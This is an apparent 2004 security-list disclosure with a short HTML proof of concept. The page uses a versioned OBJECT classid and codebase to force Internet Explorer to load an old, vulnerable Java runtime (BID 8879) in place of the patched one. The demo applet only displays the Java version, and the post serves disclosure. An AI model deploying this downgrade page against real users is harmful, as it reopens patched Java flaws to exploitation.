-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 In reference to this: http://www.securityfocus.com/archive/1/382281/2004-11-23/2004-11- 29/0 <html> <title> Java Version Downgrade proof-of-concept </title> <body> Demonstration uses the following vulnerability: <br> http://www.securityfocus.com/bid/8879 <br> Source code for Simple.class: <br> http://www.securityfocus.com/bid/8879/exploit/ <p> Added this code to Simple.java for debugging purposes: <br> String javaVersion = System.getProperty("java.version"); <br> addItem("Java version: " + javaVersion); <p> This proof-of-concept was tested on a Windows system using IE with the following Java installations: <br> Sun JRE 1.3.1_07 (vulnerable to BID 8879) <br> Sun JRE 1.3.1_13 (not vulnerable to BID 8879) <br> note: invoking applet normally should run Simple.class in JRE 1.3.1_13. <p> <OBJECT classid="clsid:CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA" width = "600" height = "100" codebase="http://java.sun.com/products/plugin/autodl/jinstall- 1_3_1_07-windows-i586.cab##Version=1_3_1_07"> <PARAM NAME="code" VALUE="Simple.class"> </OBJECT> </body> </html> cheers! -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkUEARECAAYFAkGnht0ACgkQaPog1qyYGULJYgCcCfLJwRDjM3fv5okud87OyhmoookA l3lwS0XvR6Zm7jg/ze5wWUkRuDU= =EE7n -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427